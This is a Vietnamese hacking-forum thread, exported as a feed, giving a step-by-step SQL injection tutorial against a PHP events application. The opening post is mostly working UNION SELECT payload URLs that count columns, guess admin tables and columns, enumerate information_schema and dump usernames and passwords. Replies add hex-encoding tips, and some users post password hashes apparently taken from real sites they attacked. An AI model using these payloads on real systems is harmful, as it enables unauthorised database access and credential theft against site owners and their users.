<![CDATA[Latest posts for the topic "Hướng dẫn khai thác SQL Injection đối với MySQL"]]> /hvaonline/posts/list/12.html JForum - http://www.jforum.net Hướng dẫn khai thác SQL Injection đối với MySQL I. Hướng dẫn cơ bản khai thác SQL Injection đối với MySQL Demo: Khai thác SQL Injection trong Basic PHP Events Lister 1.0 Đầu tiên với URL: http://seamoun.com/phpevents/event.php?id=1 Thực hiện thêm dấu ' sau id=1. URL trở thành http://seamoun.com/phpevents/event.php?id=1' Ta phát hiện rằng phpvents có lỗi SQL Injection với thông báo sau: Code:
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\phpevents\event.php on line 37
Đối tượng khai thác SQL Injection ở đây là "Basic PHP Events Lister 1.0". Giả sử chúng ta không biết trường và bảng của ứng dụng web này là gì? Với lỗi SQL Injection gây ra bởi URL trên ta xem thử truy vấn (SQL) của nó liệu có bao nhiều trường. Sở dĩ cần xác định điều này bởi vì khi chúng ta dùng UNION trong câu lệnh SQL thì số lượng trường của hai câu lệnh select phải trùng nhau. (Các bạn không rõ vấn đề này thì xem ý nghĩa câu lệnh SQL. Ở đây mình không giải thích vì hiển nhiên phải hiểu rõ SQL mới khai thá được). Xác định có bao nhiêu trường truy vấn với URL http://seamoun.com/phpevents/event.php?id=1 có rất nhiều cách để thực hiện. Ở đây mình sử dụng order by <num>. Thực hiện tăng dần <num>. Khi thực hiện order by <num>, nếu trang web không hiển thị lỗi tức là số lượng trường vẫn còn, thực hiện tăng <num> cho đến khi nào xuất hiện lỗi tức là ta đã thực hiện tìm đủ số lượng trường. Lần lượt mình thử: Code:
http://seamoun.com/phpevents/event.php?id=1 order by 1
 http://seamoun.com/phpevents/event.php?id=1 order by 2
 http://seamoun.com/phpevents/event.php?id=1 order by 3
...

 http://seamoun.com/phpevents/event.php?id=1 order by 15 (<-- Vẫn OK)
 http://seamoun.com/phpevents/event.php?id=1 order by 16 (Xuất hiện lỗi)
Như vậy truy vấn SQL với URL trên là 15 trường (field) Đến đây có thể điều tra phiên bản SQL, user với lệnh sau Code:
http://seamoun.com/phpevents/event.php?id=1 union all select 1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1

 http://seamoun.com/phpevents/event.php?id=1 union all select 1,user(),1,1,1,1,1,1,1,1,1,1,1,1,1
Sau khi đã có số lượng trường rồi thì lúc này sẽ tiến hành đoán bảng (table) login của nó: có thể thử với các table thông dụng như manager, admin, administrator, systemlogin, ... (Việc đoán table thuộc về kinh nghiệm, kết hợp với việc crawl, spider nội dung web mà mình khai thác). Nếu như tên bảng không đúng thì khi thực hiện union all select ... nó sẽ thông báo lỗi, ngược lại nếu tên đúng thì nó chạy OK. Tiến hành thử tìm table như sau: Code:
http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from systemlogin (Fail)
 http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from manager (Fail)
 http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)
Sau khi đoán được tên table là admin. Tiếp theo là dự đoán tên trường trong bảng admin mà mình đã lấy được. Có thể đoán tên trường trong bảng admin như là username,uname,user, ... pass, passwd, password, pword, .... (Tương tự như trên cũng tùy thuộc vào kinh nghiệm kết hợp với việc crawl, spider nội dung web để tìm tên trường). Tiền hành thử như sau Code:
http://seamoun.com/phpevents/event.php?id=1 union all select 1,username,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
 http://seamoun.com/phpevents/event.php?id=1 union all select 1,user,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
 http://seamoun.com/phpevents/event.php?id=1 union all select 1,uname,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

Như vậy trường thứ nhất ta đoán được là uname trong bảng admin. Thực hiện đoán trường mật khẩu

 http://seamoun.com/phpevents/event.php?id=1 union all select 1,password,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
 http://seamoun.com/phpevents/event.php?id=1 union all select 1,passwd,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
 http://seamoun.com/phpevents/event.php?id=1 union all select 1,pword,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)
Như vậy ta đoán được trường mật khẩu là pword. Như vậy ta đã có thông tin đầy đủ để lấy user và pass trong bảng admin với 2 trường uname và pword + tên bảng là admin Thực hiện lệnh: Code:
http://seamoun.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 from admin.
Thực chất với hai câu lệnh trên thì ta tìm được user và pass nhưng muốn thực hiện lệnh http://seamoun.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 from admin. Để có được tất cả user và pass trong bảng admin. Nếu trường hợp này xuất hiện lỗi ta có thể thêm limit 0,1 và tăng dần limit 1,1 limit 2,1 để lấy hết tất cả user và pass Sở dĩ thực hiện câu lệnh trên để đồng thời lấy uname và pword không cần phải thực hiện 2 lần mới có được uname và pword. 0x3a---> dấu ":". Concat sẽ thực hiện cộng chuỗi Đến đây ta đã có thông tin uname và pword. Nếu trường hợp mà kết nối đến MySQL sử dụng user root thì việc tìm bảng và trường dễ dàng hơn với lệnh sau Code:
Điều tra thông tin bảng:

 http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,table_name,1,1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables

Điều tra thông tin trường:

 http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,column_name,1,1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns
Ngoài ra trong một số trường hợp xuất hiện lỗi khi thực hiện khai thác có thể sử dụng hàm convert, hex, ... để không bị lỗi khi khai thác như: http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,unhex(hex(uname)),1,1,1,1,1,1,1,1,1,1,1,1 from admin II. Demo: Khai thác SQL Injection trong Basic PHP Events Lister 1.0 (milw0rm.com) Đây chỉ là hướng dẫn cơ bản nhất về khai thác SQL - Injection đối với MySQL. Các bạn demo thì install trên máy mình để kiểm tra, đừng đi hack người khác à nha. ]]>
/hvaonline/posts/list/25210.html#152645 /hvaonline/posts/list/25210.html#152645 GMT
Re: Hướng dẫn khai thác SQL Injection đối với MySQL http://milw0rm.com/papers/225. Có giới thiệu thêm một số hàm và một số phương thức có thể lấy thông tin về table, column như sử dụng group_concat, ... Các bạn có thể đọc thêm để tham khảo B-) ]]> /hvaonline/posts/list/25210.html#153463 /hvaonline/posts/list/25210.html#153463 GMT Re: Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#153488 /hvaonline/posts/list/25210.html#153488 GMT Re: Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#154254 /hvaonline/posts/list/25210.html#154254 GMT Re: Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#154260 /hvaonline/posts/list/25210.html#154260 GMT Re: Hướng dẫn khai thác SQL Injection đối với MySQL information_schema.tables where table_schema=database()  để tìm table :) thôi, cứ vậy tìm đc table thì lấy columns
information_schema.columns where table_name=[ten table] 
[ten_table] : cần hex đi :) ]]>
/hvaonline/posts/list/25210.html#154610 /hvaonline/posts/list/25210.html#154610 GMT
Re: Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#158253 /hvaonline/posts/list/25210.html#158253 GMT Re: Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#158257 /hvaonline/posts/list/25210.html#158257 GMT Re: Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#169968 /hvaonline/posts/list/25210.html#169968 GMT Re: Hướng dẫn khai thác SQL Injection đối với MySQL Code:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,bangkhen,chitiethd,codong,codong_EN,counter,download,download_EN,hoadon,khachhang,lienhe,link,menudownlo
em sử dụng câu truy vấn http://www.site.com/index.php/id=6 union select 1,2,3,column_name,5 from information_shema.columns where table_name=""-- ==> thì nó báo lổi vậy thì em sai ở bước nào vậy?]]>
/hvaonline/posts/list/25210.html#171987 /hvaonline/posts/list/25210.html#171987 GMT
Re: Hướng dẫn khai thác SQL Injection đối với MySQL

tinios wrote:
mọi người cho em hỏi giả sử em có các bảng như sau Code:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,bangkhen,chitiethd,codong,codong_EN,counter,download,download_EN,hoadon,khachhang,lienhe,link,menudownlo
em sử dụng câu truy vấn http://www.site.com/index.php/id=6 union select 1,2,3,column_name,5 from information_shema.columns where table_name=""-- ==> thì nó báo lổi vậy thì em sai ở bước nào vậy? 
tớ nghĩ cậu nên hex cái table_name lên thì được á. Code:
......from information_shema.columns where table_name=0x[table_name đã hex]
]]>
/hvaonline/posts/list/25210.html#182166 /hvaonline/posts/list/25210.html#182166 GMT
Re: Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#182195 /hvaonline/posts/list/25210.html#182195 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#182775 /hvaonline/posts/list/25210.html#182775 GMT Hướng dẫn khai thác SQL Injection đối với MySQL muốn hack thì phải GIỎI những thứ CĂN BẢN / NỀN TẢNG trước như lập trình, SQL, v.v..." - và "khi đã GIỎI những thứ CĂN BẢN / NỀN TẢNG rồi thì tự nhiên sẽ biết hack" Chẳng hạn như không biết lập trình, không biết SQL, không biết những thứ nền tảng này thì có biết site bị lỗi cũng không biết đường nào mà khai thác.]]> /hvaonline/posts/list/25210.html#182787 /hvaonline/posts/list/25210.html#182787 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#183054 /hvaonline/posts/list/25210.html#183054 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#183074 /hvaonline/posts/list/25210.html#183074 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#183883 /hvaonline/posts/list/25210.html#183883 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

khovingu89 wrote:
SQL bị lỗi hack cũng giễ thôi mà khó là khó cái đoạn crack md5 và tìm link admin 
:D Đúng là "Giễ" ! Bạn nên xem lại chính tả và học nhìu hơn về lập trình rồi hẳn tham gia phát bỉu ! Chân thành đấy ;)]]>
/hvaonline/posts/list/25210.html#183886 /hvaonline/posts/list/25210.html#183886 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL

flier_vn wrote:

khovingu89 wrote:
SQL bị lỗi hack cũng giễ thôi mà khó là khó cái đoạn crack md5 và tìm link admin 
:D Đúng là "Giễ" ! Bạn nên xem lại chính tả và học nhìu hơn về lập trình rồi hẳn tham gia phát bỉu ! Chân thành đấy ;) 
Nên dùng tiếng Việt cho đúng, đừng dùng những từ biến thái như thế (ít ra là trên diễn đàn này). Thật lòng đấy.]]>
/hvaonline/posts/list/25210.html#183901 /hvaonline/posts/list/25210.html#183901 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#186362 /hvaonline/posts/list/25210.html#186362 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#186377 /hvaonline/posts/list/25210.html#186377 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#186478 /hvaonline/posts/list/25210.html#186478 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

xichjum wrote:
anh em cho mình hởi có khi nào hack hai trang web cùng kiểu mà lòi ra hai mã được mã hóa khac nhau không.minh hack hai trang ma một mã thì là md5 còn mã kia thi carck nó bằng md5 thì không được anh em có cách nào chỉ dùm mình với thank! 3fa97d17baea21ddfb7e5ba1a8f34e3e nó đây :D :D :D :D :D  
Thử tự hỏi "hack cùng một kiểu" có quyết định sự khác nhau của cơ chế hashing trên 2 site khác nhau hay không? Đưa cái hash lên để làm chi vậy?]]>
/hvaonline/posts/list/25210.html#186481 /hvaonline/posts/list/25210.html#186481 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#186515 /hvaonline/posts/list/25210.html#186515 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:
phần lấy password nó ra thế này e8772a36a8f284c2060a70d16cb7d03a và mình đã dùng thử để truy cập nhưng không được chắc là password đã bị mã hóa rồi. vậy làm sao để tìm pass thật đây? các pro giúp dùm. cũng chỉ test chứ không có ý phá người ta. 
Chủ đề này là chủ đề "giải mã" hay là chủ đề nói về mysql injection vậy?]]>
/hvaonline/posts/list/25210.html#186523 /hvaonline/posts/list/25210.html#186523 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#186548 /hvaonline/posts/list/25210.html#186548 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:
thì mình không hề nhờ giải mã mà :( ý mình ở đây là mình làm theo hướng dẫn nhưng không ra password bình thường mà lại ra password đã bị mã hóa. và mình không hiểu lý do tại sao lại vậy. không lẽ kết quả đạt được lại mang tính hên xui .... (xui thì ra pw đã bị mã hóa như mình) 
Nếu mật khẩu được "mã hóa" và lưu trong CSDL ở dạng "mã hóa" thì bồ "lấy" nó ra, nó cũng ở dạng "mã hóa" chớ có gì đâu mà khó hiểu? 99.99999% các ứng dụng thời buổi này không lưu mật khẩu ở dạng cleartext mà thường được "mã hóa". Đây là chuyện thông thường mà thôi. Chẳng có gì hên xui cả.]]>
/hvaonline/posts/list/25210.html#186572 /hvaonline/posts/list/25210.html#186572 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#186573 /hvaonline/posts/list/25210.html#186573 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:
nói như admin thì theo em hiểu khai thác SQL Injection bây h 99.99999% thu được password được "mã hóa" ? không lẽ cách thâm nhập này đã lỗi thời? newbie có zi ko đúng xin thứ lỗi. 
Cách thâm nhập nào thuộc dạng step-by-step và người thâm nhập không hiểu cấu trúc của ứng dụng mình đang thâm nhập thì lúc nào cũng lỗi thời cả. Ngay cả khi cái "step-by-step" ấy vừa được ra đời, nó đã... lỗi thời.]]>
/hvaonline/posts/list/25210.html#186574 /hvaonline/posts/list/25210.html#186574 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#186578 /hvaonline/posts/list/25210.html#186578 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:
em nghĩ rằng SQL Injection là bug trong mySQL và mình khai thác nó, tất nhiên sử dụng code mySQL để thâm nhập rồi. ngoài ra còn phải hiểu cấu trúc gì thêm ? anh nói : "cấu trúc của ứng dụng mình đang thâm nhập" ở đây là gì? có thể nói rõ hơn 1 chút không ạ? mong được chỉ giáo thêm. cám ơn! 
Bạn nói đúng :) Nhưng vấn đề bạn lấy được mã md5 rồi mà không biết phải làm gì với nó thì đó là lúc mà bạn phải tìm hiểu về cấu trúc của website đang thâm nhập :) Bạn phải hiểu được cách tạo ra mã md5 đó, ví dụ được md5 mấy lần, mã md5 này có liên quan đến một chuỗi nào đó để tạo ra nó không,... etc. và quan trọng là hack thì phải biết mình cần cái gì,.. giống như kiểu muốn ăn thì lăn vào bếp vậy :D I'm only a newbie, dont hurt me, plz :D]]>
/hvaonline/posts/list/25210.html#186593 /hvaonline/posts/list/25210.html#186593 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:
em nghĩ rằng SQL Injection là bug trong mySQL và mình khai thác nó, tất nhiên sử dụng code mySQL để thâm nhập rồi. ngoài ra còn phải hiểu cấu trúc gì thêm ? anh nói : "cấu trúc của ứng dụng mình đang thâm nhập" ở đây là gì? có thể nói rõ hơn 1 chút không ạ? mong được chỉ giáo thêm. cám ơn! 
Bồ nên hiểu thêm thế nào là sql injection và không nên "nghĩ" mà không rõ tính chất của nó. mySQL hoặc bất cứ CSDL nào chỉ là CSDL. Ta truy vấn cái gì, nó trả lời cái nấy. Ta truy vấn sai, nó từ chối cung cấp thông tin. SQL injection xảy bởi vì ứng dụng web "bị" dùng để truy vấn những thứ lẽ ra không nên truy vấn. Đây là lỗi của ứng dụng web chớ chẳng phải lỗi của CSDL bởi vì nó không kiểm soát "cái gì" được dùng để truy vấn đến CSDL. Riêng khoản "cấu trúc của ứng dụng mình đang thâm nhập" thì khoản này khá rộng. Ví dụ, bồ đang thử SQL inject để "mò" lấy thông tin của cột chứa mật khẩu và bồ biết rằng ứng dụng web bồ đang tấn công là vBulletin Forum chẳng hạn. Để hiểu cấu trúc của nó, trước tiên bồ cần có source của vBulletin và nghiên cứu cơ chế tạo và lưu mật khẩu. Nếu biết trước rằng vBulletin hash mật khẩu hai lần bằng MD5 thì có lẽ bồ không phải tốn thời gian để thực hiện SQL Injection để thâu lượm được một mới MD5 hash kia. Điều căn bản nhất cần ghi nhớ: muốn exploit cái gì thì phải nắm vững cái ấy.]]>
/hvaonline/posts/list/25210.html#186604 /hvaonline/posts/list/25210.html#186604 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#186610 /hvaonline/posts/list/25210.html#186610 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:
@lyhuuloi: mới đọc mấy bài của bác bên phần lập trình web ^^! ma em có commen bên blog của bác rồi. mong bác sớm hồi âm smilie 
Hi, mình đã trả lời lại trên Blog, thanks bạn đã comment, and hope you like it :) Hello HVA :D]]>
/hvaonline/posts/list/25210.html#186612 /hvaonline/posts/list/25210.html#186612 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#186651 /hvaonline/posts/list/25210.html#186651 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#187118 /hvaonline/posts/list/25210.html#187118 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:
nhìn vào lỗi truy vấn làm sao biết dc web sử dụng loại database nào? đối với mỗi loại database thì lệnh truy vấn sẽ khác nhau phải ko nhỉ? ví dụ như mySQL và SQLserver code truy vấn trên url sẽ khác nhau? lỗi xuất hiện khi thêm ' sau id : SQL query : SELECT * FROM hn_aboutuS WHERE AU_ID=8\' SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 File : AboutUs.php Line : 100 vậy web đã vá lỗi hay chưa? xin chỉ giáo. cám ơn! 
---> quá rõ. Lỗi gì mà vá? Nếu lỗi do mình tạo câu truy vấn sai cú pháp thì... vá cái gì?]]>
/hvaonline/posts/list/25210.html#187123 /hvaonline/posts/list/25210.html#187123 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#187148 /hvaonline/posts/list/25210.html#187148 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

c0ngit wrote:
msa sao khi muốn test lại lỗi vậy, có phải mạng của mình có vấn đề hay là do site nhỉ :| 
Tại sao hỏi một câu không có đầu đũa và vô nghĩa như vậy?]]>
/hvaonline/posts/list/25210.html#187151 /hvaonline/posts/list/25210.html#187151 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL

tinios wrote:
mọi người cho em hỏi trong blind SQL thì làm sao phân biệt được MSSQL và MYSQL vì thường lỗi không xuất ra màn hình  
Cái này thì theo kinh nghiệm của mình thì đa phần thằng nào xài PHP là dùng MySQL còn ASP, ASP.NET thì MSSQL, còn không thì bác có thể đoán qua function version() (MYSQL) hay @@version (MSSQL).]]>
/hvaonline/posts/list/25210.html#187175 /hvaonline/posts/list/25210.html#187175 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:
nhìn vào lỗi truy vấn làm sao biết dc web sử dụng loại database nào? đối với mỗi loại database thì lệnh truy vấn sẽ khác nhau phải ko nhỉ? ví dụ như mySQL và SQLserver code truy vấn trên url sẽ khác nhau? ----------------------------------------------------------------------------------------------------------------------------------- lỗi xuất hiện khi thêm ' sau id : SQL query : SELECT * FROM hn_aboutuS WHERE AU_ID=8\' SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 File : AboutUs.php Line : 100 vậy web đã vá lỗi hay chưa? xin chỉ giáo. cám ơn! 
bác conmale ơi! câu hỏi của em chia thành 2 câu riêng biệt, phần trên và dưới gạch ngang ko a/h gì đến nhau ạ! mà trong câu hỏi dưới thì lỗi xuất hiện khi em thêm ' sau id trên url (tại sao lại là truy vấn sai?) cám ơn bác nhiều!]]>
/hvaonline/posts/list/25210.html#187205 /hvaonline/posts/list/25210.html#187205 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:

constructor_87 wrote:
nhìn vào lỗi truy vấn làm sao biết dc web sử dụng loại database nào? đối với mỗi loại database thì lệnh truy vấn sẽ khác nhau phải ko nhỉ? ví dụ như mySQL và SQLserver code truy vấn trên url sẽ khác nhau? ----------------------------------------------------------------------------------------------------------------------------------- lỗi xuất hiện khi thêm ' sau id : SQL query : SELECT * FROM hn_aboutuS WHERE AU_ID=8\' SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 File : AboutUs.php Line : 100 vậy web đã vá lỗi hay chưa? xin chỉ giáo. cám ơn! 
bác conmale ơi! câu hỏi của em chia thành 2 câu riêng biệt, phần trên và dưới gạch ngang ko a/h gì đến nhau ạ! mà trong câu hỏi dưới thì lỗi xuất hiện khi em thêm ' sau id trên url (tại sao lại là truy vấn sai?) cám ơn bác nhiều! 
2 câu riêng biệt nhưng phần 2 trả lời cho phần 1. Tại sao truy vấn sai? Đọc trang http://dev.mysql.com/doc/.]]>
/hvaonline/posts/list/25210.html#187206 /hvaonline/posts/list/25210.html#187206 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#187242 /hvaonline/posts/list/25210.html#187242 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:
thế bác cho em bỏ câu thứ 2 đi! em chỉ muốn tìm hiểu thế này "nhìn vào lỗi truy vấn làm sao biết dc web sử dụng loại database nào? đối với mỗi loại database thì lệnh truy vấn sẽ khác nhau phải ko nhỉ? ví dụ như mySQL và SQLserver code truy vấn trên url sẽ khác nhau?" trăm sự nhờ bác ^^! mà link bác cho die ròi >"<  
Học để biết SQL là gì rồi hẵng nói đến chuyện SQL Injection.]]>
/hvaonline/posts/list/25210.html#187265 /hvaonline/posts/list/25210.html#187265 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#187309 /hvaonline/posts/list/25210.html#187309 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:
thôi thì bác chiếu cố bật mí cho em tí. chứ em cũng đang mày mò SQL đâu phải hỏi chơi đâu ạ , huu 
Bác conmale nói đúng mà :) Nếu đúng là đang mò SQL thật, thì chắc hẳn nhìn câu 2 đã trả lời cho câu 1 rồi, học đi trước khi học chạy nhé bạn ;) PS: Em thích câu trả lời của bác conmale lắm :D]]>
/hvaonline/posts/list/25210.html#187335 /hvaonline/posts/list/25210.html#187335 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL

lyhuuloi wrote:

constructor_87 wrote:
thôi thì bác chiếu cố bật mí cho em tí. chứ em cũng đang mày mò SQL đâu phải hỏi chơi đâu ạ , huu 
Bác conmale nói đúng mà :) Nếu đúng là đang mò SQL thật, thì chắc hẳn nhìn câu 2 đã trả lời cho câu 1 rồi, học đi trước khi học chạy nhé bạn ;) PS: Em thích câu trả lời của bác conmale lắm :D 
hỏi là cách học tập nhanh nhất mà.... em đang học chứ có chơi đâu bác lyhuuloi =(( ]]>
/hvaonline/posts/list/25210.html#187452 /hvaonline/posts/list/25210.html#187452 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:

lyhuuloi wrote:

constructor_87 wrote:
thôi thì bác chiếu cố bật mí cho em tí. chứ em cũng đang mày mò SQL đâu phải hỏi chơi đâu ạ , huu 
Bác conmale nói đúng mà :) Nếu đúng là đang mò SQL thật, thì chắc hẳn nhìn câu 2 đã trả lời cho câu 1 rồi, học đi trước khi học chạy nhé bạn ;) PS: Em thích câu trả lời của bác conmale lắm :D 
hỏi là cách học tập nhanh nhất mà.... em đang học chứ có chơi đâu bác lyhuuloi =((  
Theo seamoun thì bạn nên học từ cái căn bản nhất, rồi hãy tính đến chuyện security, hack hiếc này nọ, chứ đừng đụng cái gì cũng hỏi, phải học và làm đi, khi đó nếu có trở ngại thì mới hỏi. Đề nghị không hỏi vu vơ trong chủ đề này nữa ! B-) B-) ]]>
/hvaonline/posts/list/25210.html#187461 /hvaonline/posts/list/25210.html#187461 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#187462 /hvaonline/posts/list/25210.html#187462 GMT Hướng dẫn khai thác SQL Injection đối với MySQL Code:
SQL query : SELECT * FROM hn_train WHERE N_ID=26 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–

SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–' at line 1

File : Trainning.php
Line : 100
=> datbase là SQL server, lỗi là do truy vấn UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES– sai trường và table. em kết luận vấy chuẩn chưa ạ? ]]>
/hvaonline/posts/list/25210.html#187468 /hvaonline/posts/list/25210.html#187468 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:
@seamoun: vừa học nhưng cũng vừa ....(hehe...) cho nó đỡ nhạt bác à hii @MrKenichi: chưa biết lỗi của từng loại database như thế nào thì sao mà so sánh hả bác :) tiện cho em test kiến thức về SQL chút :D Code:
SQL query : SELECT * FROM hn_train WHERE N_ID=26 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–

SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the [color=#444444][color=red]right syntax to u[/color]se near '1 [/color]TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–' at line 1

File : Trainning.php
Line : 100
=> datbase là SQL server, lỗi là do truy vấn UNION SELECT [color=red]TOP 1[/color] TABLE_NAME FROM INFORMATION_SCHEMA.TABLES– sai trường và table. em kết luận vấy chuẩn chưa ạ?  
Tôi đã nói là bạn hãy học kỹ SQL đối với từng loại database rồi hãy hỏi. ]]>
/hvaonline/posts/list/25210.html#187477 /hvaonline/posts/list/25210.html#187477 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#187494 /hvaonline/posts/list/25210.html#187494 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#187514 /hvaonline/posts/list/25210.html#187514 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#187873 /hvaonline/posts/list/25210.html#187873 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

conmale wrote:

constructor_87 wrote:
thì mình không hề nhờ giải mã mà :( ý mình ở đây là mình làm theo hướng dẫn nhưng không ra password bình thường mà lại ra password đã bị mã hóa. và mình không hiểu lý do tại sao lại vậy. không lẽ kết quả đạt được lại mang tính hên xui .... (xui thì ra pw đã bị mã hóa như mình) 
Nếu mật khẩu được "mã hóa" và lưu trong CSDL ở dạng "mã hóa" thì bồ "lấy" nó ra, nó cũng ở dạng "mã hóa" chớ có gì đâu mà khó hiểu? 99.99999% các ứng dụng thời buổi này không lưu mật khẩu ở dạng cleartext mà thường được "mã hóa". Đây là chuyện thông thường mà thôi. Chẳng có gì hên xui cả. 
hầu như password thu đc thời buổi này đều đc "mã hóa" như bác nói. có lẽ sql injection "lỗi thời" thật rồi bác à! mà các câu truy vấn tùy thuộc theo code của web chứ loại database đâu có a/h gì đến truy vấn của sql ịnection đâu bác nhỉ? ]]>
/hvaonline/posts/list/25210.html#187951 /hvaonline/posts/list/25210.html#187951 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#187963 /hvaonline/posts/list/25210.html#187963 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:

conmale wrote:

constructor_87 wrote:
thì mình không hề nhờ giải mã mà :( ý mình ở đây là mình làm theo hướng dẫn nhưng không ra password bình thường mà lại ra password đã bị mã hóa. và mình không hiểu lý do tại sao lại vậy. không lẽ kết quả đạt được lại mang tính hên xui .... (xui thì ra pw đã bị mã hóa như mình) 
